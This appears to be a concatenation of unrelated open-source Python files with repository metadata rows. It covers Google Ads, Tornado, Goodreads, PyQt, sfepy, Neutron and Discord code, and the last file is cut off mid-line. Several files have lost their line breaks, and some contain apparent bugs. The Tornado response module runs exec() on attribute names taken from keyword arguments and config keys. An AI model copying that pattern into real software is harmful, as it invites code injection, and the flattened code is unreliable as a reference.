protobuf request object. # Sanity check: If we got a request object, we should *not* have # gotten any keyword arguments that map to the request. if request is not None and any([resource_name]): raise ValueError( "If the `request` argument is set, then none of " "the individual field arguments should be set." ) # Minor optimization to avoid making a copy if the user passes # in a ad_schedule_view_service.GetAdScheduleViewRequest. # There's no risk of modifying the input as we've already verified # there are no flattened fields. if not isinstance( request, ad_schedule_view_service.GetAdScheduleViewRequest ): request = ad_schedule_view_service.GetAdScheduleViewRequest(request) # If we have keyword arguments corresponding to fields on the # request, apply these. if resource_name is not None: request.resource_name = resource_name # Wrap the RPC method; this adds retry and timeout information, # and friendly error handling. rpc = self._transport._wrapped_methods[ self._transport.get_ad_schedule_view ] # Certain fields should be provided within the metadata header; # add these here. metadata = tuple(metadata) + ( gapic_v1.routing_header.to_grpc_metadata( (("resource_name", request.resource_name),) ), ) # Send the request. response = rpc( request, retry=retry, timeout=timeout, metadata=metadata, ) # Done; return the response. return response __all__ = ("AdScheduleViewServiceClient",)
apache-2.0
-5,497,888,377,128,880,000
40.45
132
0.621943
false
4.550399
false
false
false
francoricci/sapspid
lib/response.py
1
4278
#import jsonlib2 import globalsObj import logging import traceback import tornado.web #import ujson #import simplejson import jsonpickle import uuid class Result(object): def __init__(self, **kwargs): #self.rootLogger = logging.getLogger('root') for name, value in kwargs.items(): exec("self." + name + " = value") def reload(self,**kwargs): self.__init__(**kwargs) class Error(object): def __init__(self, **kwargs): #self.rootLogger = logging.getLogger('root') for name, value in kwargs.items(): exec("self." + name + " = value") def setSection(self,section): if globalsObj.errors_configuration.has_section(section): errorsDict = dict(globalsObj.errors_configuration.items(section)) for key, val in enumerate(errorsDict.keys()): exec("self." + val + " = errorsDict[val]") #if self.code is not None: # self.code = int(self.code) return True else: logging.getLogger(__name__).error("Error section %s not present" % (section)) return False def reload(self,**kwargs): self.__init__(**kwargs) class ResponseObj(object): def __init__(self, ID = None, **kwargs): #self.rootLogger = logging.getLogger('root') self.apiVersion = globalsObj.configuration.get('version','version') self.error = None self.result = None self.setID(ID) self.error = Error(**kwargs) def setResult(self, **kwargs): self.result = Result(**kwargs) def setError(self, section=None): if section is not None: if self.error.setSection(section): return True else: return False def setID(self, ID): if ID is None or ID == "": self.id = str(uuid.uuid4()) else: self.id = ID def jsonWrite(self): try: #jsonOut = jsonlib2.write(self, default=lambda o: o.__dict__,sort_keys=False, indent=4,escape_slash=False) jsonOut = jsonpickle.encode(self, unpicklable=False) #jsonOut = ujson.dumps(self, ensure_ascii=False, indent=4) #jsonOut2 = simplejson.dumps(pippo, ensure_ascii=False, indent=4) return jsonOut except BaseException as error: logging.getLogger(__name__).error("Error on json encoding %s" % (error.message)) return False class RequestHandler(tornado.web.RequestHandler): @property def executor(self): return self.application.executor def compute_etag(self): return None def write_error(self, status_code, errorcode = '3', **kwargs): self.set_header('Content-Type', 'application/json; charset=UTF-8') self.set_status(status_code) # debug info if self.settings.get("serve_traceback") and "exc_info" in kwargs: debugTmp = "" for line in traceback.format_exception(*kwargs["exc_info"]): debugTmp += line getResponse = ResponseObj(debugMessage=debugTmp,httpcode=status_code,devMessage=self._reason) else: getResponse = ResponseObj(httpcode=status_code,devMessage=self._reason) getResponse.setError(errorcode) getResponse.setResult() self.write(getResponse.jsonWrite()) self.finish() class StaticFileHandler(tornado.web.StaticFileHandler): def compute_etag(self): return None def write_error(self, status_code, errorcode = '3', **kwargs): self.set_header('Content-Type', 'application/json; charset=UTF-8') self.set_status(status_code) # debug info if self.settings.get("serve_traceback") and "exc_info" in kwargs: debugTmp = "" for line in traceback.format_exception(*kwargs["exc_info"]): debugTmp += line getResponse = ResponseObj(debugMessage=debugTmp,httpcode=status_code,devMessage=self._reason) else: getResponse = ResponseObj(httpcode=status_code,devMessage=self._reason) getResponse.setError(errorcode) getResponse.setResult() self.write(getResponse.jsonWrite()) self.finish()
mit
-6,579,047,088,402,858,000
31.907692
119
0.605423
false
4.032045
false
false
false
tatianass/goodreads2
goodreads/request.py
1
1066
import requests import xmltodict import json class GoodreadsRequestException(Exception): def __init__(self, error_msg, url): self.error_msg = error_msg self.url = url def __str__(self): return self.url, ':', self.error_msg class GoodreadsRequest(): def __init__(self, client, path, query_dict, req_format='xml'): """Initialize request object.""" self.params = query_dict self.params.update(client.query_dict) self.host = client.base_url self.path = path self.req_format = req_format def request(self): resp = requests.get(self.host+self.path, params=self.params, timeout=60) if resp.status_code != 200: raise GoodreadsRequestException(resp.reason, self.path) if self.req_format == 'xml': data_dict = xmltodict.parse(resp.content) return data_dict['GoodreadsResponse'] elif self.req_format == 'json': return json.loads(resp.content) else: raise Exception("Invalid format")
mit
-593,627,982,775,317,100
30.352941
80
0.61257
false
3.933579
false
false
false
gem/sidd
ui/dlg_result.py
1
7317
# Copyright (c) 2011-2013, ImageCat Inc. # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # """ dialog for editing mapping scheme branches """ from PyQt4.QtGui import QDialog, QCloseEvent, QAbstractItemView from PyQt4.QtCore import Qt, pyqtSlot, QSettings, QVariant, QString, QAbstractTableModel from operator import itemgetter from sidd.constants import logAPICall, SIDD_COMPANY, SIDD_APP_NAME, SIDD_VERSION, CNT_FIELD_NAME from ui.constants import logUICall, UI_PADDING from ui.qt.dlg_res_detail_ui import Ui_tablePreviewDialog class DialogResult(Ui_tablePreviewDialog, QDialog): """ dialog for visualize result details """ # CONSTANTS ############################# UI_WINDOW_GEOM = 'dlg_result/geometry' # constructor ############################### def __init__(self): super(DialogResult, self).__init__() self.ui = Ui_tablePreviewDialog() self.ui.setupUi(self) self.ui.table_result.setSelectionMode(QAbstractItemView.SingleSelection) self.ui.table_result.setSortingEnabled(True) # connect slots (ui event) self.ui.btn_ok.clicked.connect(self.accept) self.settings = QSettings(SIDD_COMPANY, '%s %s' %(SIDD_APP_NAME, SIDD_VERSION)); self.restoreGeometry(self.settings.value(self.UI_WINDOW_GEOM).toByteArray()); # window event handler overrides ############################# def resizeEvent(self, event): """ handle window resize """ self.ui.table_result.resize(self.width()-2*UI_PADDING, self.height() - self.ui.table_result.y()-self.ui.btn_ok.height()-2*UI_PADDING) below_table = self.height() - self.ui.btn_ok.height() - UI_PADDING self.ui.lb_bldgcount.move(UI_PADDING, below_table) self.ui.txt_bldgcount.move(self.ui.lb_bldgcount.width()+(2*UI_PADDING), below_table) self.ui.btn_ok.move(self.width()-UI_PADDING-self.ui.btn_ok.width(), below_table) @pyqtSlot(QCloseEvent) def closeEvent(self, event): self.settings.setValue(self.UI_WINDOW_GEOM, self.saveGeometry()); super(DialogResult, self).closeEvent(event) # public method ############################### @logUICall def showExposureData(self, header, selected): """ display selected rows with header """ fnames =[] # retrieve field name as table headers cnt_sum = 0 # total number of buildings # find index for building count field cnt_idx = -1 for i, f in header.iteritems(): fnames.append(f.name()) if f.name() == CNT_FIELD_NAME: cnt_idx = i if cnt_idx <> -1: # building count index is found # increment building count for s in selected: cnt_sum += s[cnt_idx].toDouble()[0] # display result self.resultDetailModel = ResultDetailTableModel(header.values(), selected) self.ui.table_result.setModel(self.resultDetailModel) self.ui.table_result.sortByColumn(3, Qt.AscendingOrder) # display exposure specific ui elements self.ui.txt_bldgcount.setVisible(True) self.ui.lb_bldgcount.setVisible(True) self.ui.txt_bldgcount.setText('%d'% round(cnt_sum)) self.ui.txt_bldgcount.setReadOnly(True) @logUICall def showInfoData(self, header, selected): # sync UI self.resultDetailModel = ResultDetailTableModel(header.values(), selected) self.ui.table_result.setModel(self.resultDetailModel) # hide exposure specific ui elements self.ui.txt_bldgcount.setVisible(False) self.ui.lb_bldgcount.setVisible(False) class ResultDetailTableModel(QAbstractTableModel): """ table model supporting visualization of result detail """ # constructor ############################### def __init__(self, fields, selected): """ constructor """ QAbstractTableModel.__init__(self) # table header self.headers = fields # create copy of values to be shown and modified # this format makes it easier to sort self.selected = [] for row in selected: new_row = [] for i, v in enumerate(row.values()): if self.headers[i].type() == QVariant.Int: new_row.append(v.toInt()[0]) elif self.headers[i].type() == QVariant.Double: new_row.append(v.toDouble()[0]) else: new_row.append(str(v.toString())) self.selected.append(new_row) # override public method ############################### @logAPICall def columnCount(self, parent): """ only two columns exist. always return 2 """ return len(self.headers) @logAPICall def rowCount(self, parent): """ number of rows same as number of siblings """ return len(self.selected) @logAPICall def headerData(self, section, orientation, role): """ return data to diaply for header row """ if role == Qt.DisplayRole: if orientation == Qt.Horizontal: return QString(self.headers[section].name()) else: # no vertical header return QVariant() else: return QVariant() @logAPICall def data(self, index, role): """ return data to be displayed in a cell """ if role == Qt.DisplayRole: logAPICall.log('row %s column %s ' %(index.row(), index.column()), logAPICall.DEBUG_L2) return QString("%s" % self.selected[index.row()][index.column()]) else: return QVariant() def sort(self, ncol, order): """ sort table """ if ncol < 0 or ncol > len(self.headers): return self.layoutAboutToBeChanged.emit() self.selected.sort(key=itemgetter(ncol), reverse=(order==Qt.DescendingOrder)) self.layoutChanged.emit() def flags(self, index): """ cell condition flag """ # NOTE: # ItemIsEditable flag requires data() and setData() function return Qt.ItemIsEnabled
agpl-3.0
7,166,657,375,103,733,000
37.708108
138
0.569906
false
4.117614
false
false
false
certik/sfepy
sfepy/mechanics/matcoefs.py
1
3273
from sfepy.base.base import * ## # c: 22.07.2008 def youngpoisson_to_lame( young, poisson, plane = 'stress' ): if plane == 'stress': lam = young*poisson/(1.0 - poisson*poisson) mu = young/(2.0*(1.0 + poisson)) elif plane == 'strain': lam = young*poisson/((1.0 + poisson)*(1.0 - 2.0*poisson)) mu = young/(2.0*(1.0 + poisson)) return {'lambda' : lam, 'mu' : mu } ## # c: 22.07.2008 def stiffness_tensor_lame( dim, lam, mu ): sym = (dim + 1) * dim / 2 o = nm.array( [1.] * dim + [0.] * (sym - dim), dtype = nm.float64 ) oot = nm.outer( o, o ) return lam * oot + mu * nm.diag( o + 1.0 ) ## # c: 22.07.2008 def stiffness_tensor_youngpoisson( dim, young, poisson, plane = 'stress' ): lame = youngpoisson_to_lame( young, poisson, plane ) return stiffness_tensor_Lame( dim, lame['lambda'], lame['mu'] ) class TransformToPlane( Struct ): """Transformmations of constitutive law coefficients of 3D problems to 2D.""" def __init__( self, iplane = None ): """`iplane` ... vector of indices denoting the plane, e.g.: [0, 1]""" if iplane is None: iplane = [0, 1] # Choose the "master" variables and the "slave" ones # ... for vectors i_m = nm.sort( iplane ) i_s = nm.setdiff1d( nm.arange( 3 ), i_m ) # ... for second order tensors (symmetric storage) i_ms = {(0, 1) : [0, 1, 3], (0, 2) : [0, 2, 4], (1, 2) : [1, 2, 5]}[tuple( i_m )] i_ss = nm.setdiff1d( nm.arange( 6 ), i_ms ) Struct.__init__( self, iplane = iplane, i_m = i_m, i_s = i_s, i_ms = i_ms, i_ss = i_ss ) def tensor_plane_stress( self, c3 = None, d3 = None, b3 = None ): """Transforms all coefficients of the piezoelectric constitutive law from 3D to plane stress problem in 2D: strain/stress ordering/ 11 22 33 12 13 23. If `d3` is None, uses only the stiffness tensor `c3`. `c3` ... stiffness tensor `d3` ... dielectric tensor `b3` ... piezoelectric coupling tensor""" mg = nm.meshgrid cs = c3[mg(self.i_ss,self.i_ss)] cm = c3[mg(self.i_ss,self.i_ms)].T if d3 is None: # elasticity only. A = cs Feps = cm Ainv = nm.linalg.inv( A ) c2 = c3[mg(self.i_ms,self.i_ms)] \ - nm.dot( Feps.T, nm.dot( Ainv, Feps ) ) return c2 else: dm = d3[mg(self.i_s,self.i_m)].T ds = d3[mg(self.i_s,self.i_s)] ii = mg( self.i_s, self.i_ss ) A = nm.r_[nm.c_[cs, b3[ii]], nm.c_[b3[ii].T, -ds]] #=> sym !!! F = nm.r_[nm.c_[cm, b3[mg(self.i_m,self.i_ss)]], nm.c_[b3[mg(self.i_s,self.i_ms)].T, -dm ]] Feps = F[:,:3] FE = F[:,3:] Ainv = nm.linalg.inv( A ) c2 = c3[mg(self.i_ms,self.i_ms)] \ - nm.dot( Feps.T, nm.dot( Ainv, Feps ) ) d2 = d3[mg(self.i_m,self.i_m)] \ - nm.dot( FE.T, nm.dot( Ainv, FE ) ) b2 = b3[mg(self.i_m,self.i_ms)].T \ - nm.dot( FE.T, nm.dot( Ainv, Feps ) ) return c2, d2, b2
bsd-3-clause
2,795,579,541,998,849,000
32.060606
81
0.486709
false
2.748111
false
false
false
oneconvergence/group-based-policy
gbpservice/neutron/db/grouppolicy/group_policy_mapping_db.py
1
18294
# Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import sqlalchemy as sa from sqlalchemy import orm from neutron.common import log from neutron.db import model_base from neutron.openstack.common import log as logging from neutron.openstack.common import uuidutils from gbpservice.neutron.db import gbp_quota_db as gquota from gbpservice.neutron.db.grouppolicy import group_policy_db as gpdb LOG = logging.getLogger(__name__) class PolicyTargetMapping(gpdb.PolicyTarget): """Mapping of PolicyTarget to Neutron Port.""" __table_args__ = {'extend_existing': True} __mapper_args__ = {'polymorphic_identity': 'mapping'} # REVISIT(ivar): Set null on delete is a temporary workaround until Nova # bug 1158684 is fixed. port_id = sa.Column(sa.String(36), sa.ForeignKey('ports.id', ondelete='SET NULL'), nullable=True, unique=True) class PTGToSubnetAssociation(model_base.BASEV2): """Many to many relation between PolicyTargetGroup and Subnets.""" __tablename__ = 'gp_ptg_to_subnet_associations' policy_target_group_id = sa.Column( sa.String(36), sa.ForeignKey('gp_policy_target_groups.id'), primary_key=True) subnet_id = sa.Column(sa.String(36), sa.ForeignKey('subnets.id'), primary_key=True) class PolicyTargetGroupMapping(gpdb.PolicyTargetGroup): """Mapping of PolicyTargetGroup to set of Neutron Subnets.""" __table_args__ = {'extend_existing': True} __mapper_args__ = {'polymorphic_identity': 'mapping'} subnets = orm.relationship(PTGToSubnetAssociation, cascade='all', lazy="joined") class L2PolicyMapping(gpdb.L2Policy): """Mapping of L2Policy to Neutron Network.""" __table_args__ = {'extend_existing': True} __mapper_args__ = {'polymorphic_identity': 'mapping'} network_id = sa.Column(sa.String(36), sa.ForeignKey('networks.id'), nullable=True, unique=True) class L3PolicyRouterAssociation(model_base.BASEV2): """Models the many to many relation between L3Policies and Routers.""" __tablename__ = 'gp_l3_policy_router_associations' l3_policy_id = sa.Column(sa.String(36), sa.ForeignKey('gp_l3_policies.id'), primary_key=True) router_id = sa.Column(sa.String(36), sa.ForeignKey('routers.id'), primary_key=True) class L3PolicyMapping(gpdb.L3Policy): """Mapping of L3Policy to set of Neutron Routers.""" __table_args__ = {'extend_existing': True} __mapper_args__ = {'polymorphic_identity': 'mapping'} routers = orm.relationship(L3PolicyRouterAssociation, cascade='all', lazy="joined") class ExternalSegmentMapping(gpdb.ExternalSegment): """Mapping of L2Policy to Neutron Network.""" __table_args__ = {'extend_existing': True} __mapper_args__ = {'polymorphic_identity': 'mapping'} subnet_id = sa.Column(sa.String(36), sa.ForeignKey('subnets.id'), nullable=True, unique=True) gquota.DB_CLASS_TO_RESOURCE_NAMES[L3PolicyMapping.__name__] = 'l3_policy' gquota.DB_CLASS_TO_RESOURCE_NAMES[L2PolicyMapping.__name__] = 'l2_policy' gquota.DB_CLASS_TO_RESOURCE_NAMES[PolicyTargetGroupMapping.__name__] = ( 'policy_target_group') gquota.DB_CLASS_TO_RESOURCE_NAMES[PolicyTargetMapping.__name__] = ( 'policy_target') gquota.DB_CLASS_TO_RESOURCE_NAMES[ExternalSegmentMapping.__name__] = ( 'external_segment') class GroupPolicyMappingDbPlugin(gpdb.GroupPolicyDbPlugin): """Group Policy Mapping interface implementation using SQLAlchemy models. """ def _make_policy_target_dict(self, pt, fields=None): res = super(GroupPolicyMappingDbPlugin, self)._make_policy_target_dict(pt) res['port_id'] = pt.port_id return self._fields(res, fields) def _make_policy_target_group_dict(self, ptg, fields=None): res = super(GroupPolicyMappingDbPlugin, self)._make_policy_target_group_dict(ptg) res['subnets'] = [subnet.subnet_id for subnet in ptg.subnets] return self._fields(res, fields) def _make_l2_policy_dict(self, l2p, fields=None): res = super(GroupPolicyMappingDbPlugin, self)._make_l2_policy_dict(l2p) res['network_id'] = l2p.network_id return self._fields(res, fields) def _make_l3_policy_dict(self, l3p, fields=None): res = super(GroupPolicyMappingDbPlugin, self)._make_l3_policy_dict(l3p) res['routers'] = [router.router_id for router in l3p.routers] return self._fields(res, fields) def _make_external_segment_dict(self, es, fields=None): res = super(GroupPolicyMappingDbPlugin, self)._make_external_segment_dict(es) res['subnet_id'] = es.subnet_id return self._fields(res, fields) def _set_port_for_policy_target(self, context, pt_id, port_id): with context.session.begin(subtransactions=True): pt_db = self._get_policy_target(context, pt_id) pt_db.port_id = port_id def _add_subnet_to_policy_target_group(self, context, ptg_id, subnet_id): with context.session.begin(subtransactions=True): ptg_db = self._get_policy_target_group(context, ptg_id) assoc = PTGToSubnetAssociation(policy_target_group_id=ptg_id, subnet_id=subnet_id) ptg_db.subnets.append(assoc) return [subnet.subnet_id for subnet in ptg_db.subnets] def _set_network_for_l2_policy(self, context, l2p_id, network_id): with context.session.begin(subtransactions=True): l2p_db = self._get_l2_policy(context, l2p_id) l2p_db.network_id = network_id def _add_router_to_l3_policy(self, context, l3p_id, router_id): with context.session.begin(subtransactions=True): l3p_db = self._get_l3_policy(context, l3p_id) assoc = L3PolicyRouterAssociation(l3_policy_id=l3p_id, router_id=router_id) l3p_db.routers.append(assoc) return [router.router_id for router in l3p_db.routers] def _set_subnet_to_es(self, context, es_id, subnet_id): with context.session.begin(subtransactions=True): es_db = self._get_external_segment(context, es_id) es_db.subnet_id = subnet_id def _update_ess_for_l3p(self, context, l3p_id, ess): with context.session.begin(subtransactions=True): l3p_db = self._get_l3_policy(context, l3p_id) self._set_ess_for_l3p(context, l3p_db, ess) def _get_l3p_ptgs(self, context, l3p_id): return super(GroupPolicyMappingDbPlugin, self)._get_l3p_ptgs( context, l3p_id, l3p_klass=L3PolicyMapping, ptg_klass=PolicyTargetGroupMapping, l2p_klass=L2PolicyMapping) @log.log def create_policy_target(self, context, policy_target): pt = policy_target['policy_target'] tenant_id = self._get_tenant_id_for_create(context, pt) with context.session.begin(subtransactions=True): pt_db = PolicyTargetMapping(id=uuidutils.generate_uuid(), tenant_id=tenant_id, name=pt['name'], description=pt['description'], policy_target_group_id= pt['policy_target_group_id'], port_id=pt['port_id']) context.session.add(pt_db) return self._make_policy_target_dict(pt_db) @log.log def get_policy_targets(self, context, filters=None, fields=None, sorts=None, limit=None, marker=None, page_reverse=False): marker_obj = self._get_marker_obj(context, 'policy_target', limit, marker) return self._get_collection(context, PolicyTargetMapping, self._make_policy_target_dict, filters=filters, fields=fields, sorts=sorts, limit=limit, marker_obj=marker_obj, page_reverse=page_reverse) @log.log def create_policy_target_group(self, context, policy_target_group): ptg = policy_target_group['policy_target_group'] tenant_id = self._get_tenant_id_for_create(context, ptg) with context.session.begin(subtransactions=True): if ptg['service_management']: self._validate_service_management_ptg(context, tenant_id) ptg_db = PolicyTargetGroupMapping( id=uuidutils.generate_uuid(), tenant_id=tenant_id, name=ptg['name'], description=ptg['description'], l2_policy_id=ptg['l2_policy_id'], network_service_policy_id=ptg['network_service_policy_id'], shared=ptg.get('shared', False), service_management=ptg.get('service_management', False)) context.session.add(ptg_db) if 'subnets' in ptg: for subnet in ptg['subnets']: assoc = PTGToSubnetAssociation( policy_target_group_id=ptg_db.id, subnet_id=subnet ) ptg_db.subnets.append(assoc) self._process_policy_rule_sets_for_ptg(context, ptg_db, ptg) return self._make_policy_target_group_dict(ptg_db) @log.log def update_policy_target_group(self, context, policy_target_group_id, policy_target_group): ptg = policy_target_group['policy_target_group'] with context.session.begin(subtransactions=True): ptg_db = self._get_policy_target_group( context, policy_target_group_id) self._process_policy_rule_sets_for_ptg(context, ptg_db, ptg) if 'subnets' in ptg: # Add/remove associations for changes in subnets. new_subnets = set(ptg['subnets']) old_subnets = set(subnet.subnet_id for subnet in ptg_db.subnets) for subnet in new_subnets - old_subnets: assoc = PTGToSubnetAssociation( policy_target_group_id=policy_target_group_id, subnet_id=subnet) ptg_db.subnets.append(assoc) for subnet in old_subnets - new_subnets: assoc = ( context.session.query( PTGToSubnetAssociation).filter_by( policy_target_group_id=policy_target_group_id, subnet_id=subnet).one()) ptg_db.subnets.remove(assoc) context.session.delete(assoc) # Don't update ptg_db.subnets with subnet IDs. del ptg['subnets'] ptg_db.update(ptg) return self._make_policy_target_group_dict(ptg_db) @log.log def create_l2_policy(self, context, l2_policy): l2p = l2_policy['l2_policy'] tenant_id = self._get_tenant_id_for_create(context, l2p) with context.session.begin(subtransactions=True): l2p_db = L2PolicyMapping(id=uuidutils.generate_uuid(), tenant_id=tenant_id, name=l2p['name'], description=l2p['description'], l3_policy_id=l2p['l3_policy_id'], network_id=l2p['network_id'], shared=l2p.get('shared', False)) context.session.add(l2p_db) return self._make_l2_policy_dict(l2p_db) @log.log def get_l2_policies(self, context, filters=None, fields=None, sorts=None, limit=None, marker=None, page_reverse=False): marker_obj = self._get_marker_obj(context, 'l2_policy', limit, marker) return self._get_collection(context, L2PolicyMapping, self._make_l2_policy_dict, filters=filters, fields=fields, sorts=sorts, limit=limit, marker_obj=marker_obj, page_reverse=page_reverse) @log.log def create_l3_policy(self, context, l3_policy): l3p = l3_policy['l3_policy'] self.validate_ip_pool(l3p.get('ip_pool', None), l3p['ip_version']) tenant_id = self._get_tenant_id_for_create(context, l3p) self.validate_subnet_prefix_length(l3p['ip_version'], l3p['subnet_prefix_length'], l3p.get('ip_pool', None)) with context.session.begin(subtransactions=True): l3p_db = L3PolicyMapping(id=uuidutils.generate_uuid(), tenant_id=tenant_id, name=l3p['name'], ip_version=l3p['ip_version'], ip_pool=l3p['ip_pool'], subnet_prefix_length= l3p['subnet_prefix_length'], description=l3p['description'], shared=l3p.get('shared', False)) if 'routers' in l3p: for router in l3p['routers']: assoc = L3PolicyRouterAssociation( l3_policy_id=l3p_db.id, router_id=router ) l3p_db.routers.append(assoc) if 'external_segments' in l3p: self._set_ess_for_l3p(context, l3p_db, l3p['external_segments']) context.session.add(l3p_db) return self._make_l3_policy_dict(l3p_db) @log.log def update_l3_policy(self, context, l3_policy_id, l3_policy): l3p = l3_policy['l3_policy'] with context.session.begin(subtransactions=True): l3p_db = self._get_l3_policy(context, l3_policy_id) if 'subnet_prefix_length' in l3p: self.validate_subnet_prefix_length(l3p_db.ip_version, l3p['subnet_prefix_length'], l3p_db.ip_pool) if 'routers' in l3p: # Add/remove associations for changes in routers. new_routers = set(l3p['routers']) old_routers = set(router.router_id for router in l3p_db.routers) for router in new_routers - old_routers: assoc = L3PolicyRouterAssociation( l3_policy_id=l3_policy_id, router_id=router) l3p_db.routers.append(assoc) for router in old_routers - new_routers: assoc = (context.session.query(L3PolicyRouterAssociation). filter_by(l3_policy_id=l3_policy_id, router_id=router). one()) l3p_db.routers.remove(assoc) context.session.delete(assoc) # Don't update l3p_db.routers with router IDs. del l3p['routers'] if 'external_segments' in l3p: self._set_ess_for_l3p(context, l3p_db, l3p['external_segments']) del l3p['external_segments'] l3p_db.update(l3p) return self._make_l3_policy_dict(l3p_db) @log.log def create_external_segment(self, context, external_segment): es = external_segment['external_segment'] tenant_id = self._get_tenant_id_for_create(context, es) with context.session.begin(subtransactions=True): es_db = ExternalSegmentMapping( id=uuidutils.generate_uuid(), tenant_id=tenant_id, name=es['name'], description=es['description'], shared=es.get('shared', False), ip_version=es['ip_version'], cidr=es['cidr'], port_address_translation=es['port_address_translation'], subnet_id=es['subnet_id']) context.session.add(es_db) if 'external_routes' in es: self._process_segment_ers(context, es_db, es) return self._make_external_segment_dict(es_db) @log.log def get_external_segments(self, context, filters=None, fields=None, sorts=None, limit=None, marker=None, page_reverse=False): marker_obj = self._get_marker_obj(context, 'external_segment', limit, marker) return self._get_collection(context, ExternalSegmentMapping, self._make_external_segment_dict, filters=filters, fields=fields, sorts=sorts, limit=limit, marker_obj=marker_obj, page_reverse=page_reverse)
apache-2.0
7,347,120,841,103,044,000
47.142105
79
0.552586
false
3.970914
false
false
false
uwcirg/true_nth_usa_portal
portal/migrations/versions/4456ad5faf86_.py
1
2041
"""empty message Revision ID: 4456ad5faf86 Revises: 521aa70e0617 Create Date: 2015-09-03 19:40:53.744703 """ # revision identifiers, used by Alembic. revision = '4456ad5faf86' down_revision = '521aa70e0617' from alembic import op import sqlalchemy as sa def upgrade(): ### commands auto generated by Alembic - please adjust! ### op.create_table('roles', sa.Column('id', sa.Integer(), nullable=False), sa.Column('name', sa.String(length=50), nullable=True), sa.PrimaryKeyConstraint('id'), sa.UniqueConstraint('name') ) op.create_table('user_roles', sa.Column('id', sa.Integer(), nullable=False), sa.Column('user_id', sa.Integer(), nullable=True), sa.Column('role_id', sa.Integer(), nullable=True), sa.ForeignKeyConstraint( ['role_id'], ['roles.id'], ondelete='CASCADE'), sa.ForeignKeyConstraint( ['user_id'], ['users.id'], ondelete='CASCADE'), sa.PrimaryKeyConstraint('id') ) op.add_column(u'users', sa.Column( 'confirmed_at', sa.DateTime(), nullable=True)) op.add_column(u'users', sa.Column('is_active', sa.Boolean(), server_default='1', nullable=False)) op.add_column(u'users', sa.Column( 'password', sa.String(length=255), nullable=True)) op.add_column(u'users', sa.Column('reset_password_token', sa.String(length=100), nullable=True)) ### end Alembic commands ### def downgrade(): ### commands auto generated by Alembic - please adjust! ### op.drop_column(u'users', 'reset_password_token') op.drop_column(u'users', 'password') op.drop_column(u'users', 'is_active') op.drop_column(u'users', 'confirmed_at') op.drop_table('user_roles') op.drop_table('roles') ### end Alembic commands ###
bsd-3-clause
5,831,843,187,538,724,000
36.796296
76
0.55757
false
3.829268
false
false
false
Sult/evetool
populate/misc.py
1
1848
import eveapi from apies.models import CallGroup, Call, Api from characters.models import RefType api = eveapi.EVEAPIConnection() data = api.API.CallList() def call_groups(): for group in data.callGroups: try: CallGroup.objects.create( groupid=group.groupID, name=group.name, description=group.description, ) except: print "You stupid" def calls(): for call in data.calls: if call.accessMask == 8388608: #no need for limited character info. Or full acces or none continue try: Call.objects.create( accessmask=call.accessMask, accounttype=call.type, name=call.name, callgroup=CallGroup.objects.get(groupid=call.groupID), description=call.description, ) except: print "Some shit didnt work dude" # extra = [] # for call in extra: # Call.objects.create( # accessmask=call.accessMask, # accounttype=Api.CHARACTER, # name=call.name, # callgroup=CallGroup.objects.get(groupid=call.groupID), # description=call.description, # ) # Call.objects.create( # accessmask=call.accessMask, # accounttype=Api.CORPORATION, # name=call.name, # callgroup=CallGroup.objects.get(groupid=call.groupID), # description=call.description, # ) def reftypes(): for ref in api.eve.RefTypes().refTypes: try: RefType.objects.create( reftypeid=ref.refTypeID, reftypename=ref.refTypeName, ) except: "You fucked up mate" call_groups() calls() reftypes()
mit
1,425,303,682,853,979,000
26.58209
70
0.551407
false
3.948718
false
false
false
EJH2/ViralBot-Discord
bot/utils/over.py
1
7167
# coding=utf-8 """Overrides for Discord.py classes""" import contextlib import inspect import io import itertools import re import discord from discord.ext.commands import HelpFormatter as HelpF, Paginator, Command from bot.utils import polr, privatebin from bot.utils.args import ArgParseConverter as ArgPC def create_help(cmd, parser): """Creates an updated usage for the help command""" default = cmd.params['args'].default if cmd.signature.split("[")[-1] == f"args={default}]" if default else "args]": sio = io.StringIO() with contextlib.redirect_stdout(sio): parser.print_help() sio.seek(0) s = sio.read() # Strip the filename and trailing newline from help text arg_part = s[(len(str(s[7:]).split()[0]) + 8):-1] k = cmd.qualified_name spt = len(k.split()) # Remove a duplicate command name + leading arguments split_sig = cmd.signature.split()[spt:] return "[".join((" ".join(split_sig)).split("[")[:-1]) + arg_part return cmd.usage class HelpFormatter(HelpF): """Custom override for the default help command""" def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) self._paginator = None async def format(self): """Handles the actual behaviour involved with formatting. To change the behaviour, this method should be overridden. Returns -------- list A paginated output of the help command. """ self._paginator = Paginator() # we need a padding of ~80 or so description = self.command.description if not self.is_cog() else inspect.getdoc(self.command) if description: # <description> portion self._paginator.add_line(description, empty=True) if isinstance(self.command, Command): # <signature portion> if self.command.params.get("args", None) and type(self.command.params['args'].annotation) == ArgPC: self.command.usage = create_help(self.command, self.command.params['args'].annotation.parser) signature = self.get_command_signature() self._paginator.add_line(signature, empty=True) # <long doc> section if self.command.help: self._paginator.add_line(self.command.help, empty=True) # end it here if it's just a regular command if not self.has_subcommands(): self._paginator.close_page() return self._paginator.pages max_width = self.max_name_size def category(tup): """Splits the help command into categories for easier readability""" cog = tup[1].cog_name # we insert the zero width space there to give it approximate # last place sorting position. return cog + ':' if cog is not None else '\u200bNo Category:' filtered = await self.filter_command_list() if self.is_bot(): data = sorted(filtered, key=category) for category, commands in itertools.groupby(data, key=category): # there simply is no prettier way of doing this. commands = sorted(commands) if len(commands) > 0: self._paginator.add_line(category) self._add_subcommands_to_page(max_width, commands) else: filtered = sorted(filtered) if filtered: self._paginator.add_line('Commands:') self._add_subcommands_to_page(max_width, filtered) # add the ending note self._paginator.add_line() ending_note = self.get_ending_note() self._paginator.add_line(ending_note) return self._paginator.pages _mentions_transforms = { '@everyone': '@\u200beveryone', '@here': '@\u200bhere' } _mention_pattern = re.compile('|'.join(_mentions_transforms.keys())) def 